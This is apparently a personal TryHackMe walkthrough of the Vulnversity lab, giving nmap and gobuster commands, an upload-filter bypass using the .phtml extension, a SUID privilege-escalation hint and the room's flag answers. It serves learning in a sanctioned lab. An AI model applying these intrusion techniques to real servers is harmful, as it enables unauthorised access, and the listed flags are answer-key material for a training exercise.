This is my TryHackMe walkthrough, created to document my learning journey and share solutions with the community. The writeups include a mix of hints, step-by-step explanations, and final answers to help players who get stuck, while still encouraging independent problem-solving.
Vulnversity Room - Learn about active recon, web app attacks and privilege escalation.
Overview
- Room URL: https://tryhackme.com/room/vulnversity
- Difficulty: Easy
- Time to complete: 45
Walkthrough
1. Deploy the machine
No hints needed!
2. Reconnaissance
Scan the box; how many ports are open?
nmap -p- <MACHINE_IP>
=> Answer: 6
What version of the squid proxy is running on the machine?
nmap -p- -A <MACHINE_IP>
=> Answer: 4.10
How many ports will Nmap scan if the flag -p-400 was used?
=> Answer: 400
What is the most likely operating system this machine is running?
nmap -O <MACHINE_IP>
Run web app, Windows, Unix, Linux => Ubuntu => Answer:
UbuntuWhat port is the web server running on?
nmap -p- -A <MACHINE_IP>
=> Answer: 3333
What is the flag for enabling verbose mode using Nmap?
=> Answer: -v
3. Locating directories using Gobuster
What is the directory that has an upload form page?
gobuster dir -u http://<MACHINE_IP>:3333 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt
=> Answer: /internal/
4. Compromise the Webserver
- What common file type you’d want to upload to exploit the server is blocked? Try a couple to find out.
=> Answer: .php
What extension is allowed after running the above exercise?
=> Answer: .phtml
What is the name of the user who manages the webserver?
=> Answer: bill
What is the user flag?
=> Answer: 8bd7992fbe8a6ad22a63361004cfcedb
5. Privilege Escalation
On the system, search for all SUID files. Which file stands out?
=> Answer: /bin/systemctl
What is the root flag value?
=> Answer: a58ff8579f0a9270368d33a9966c7fd5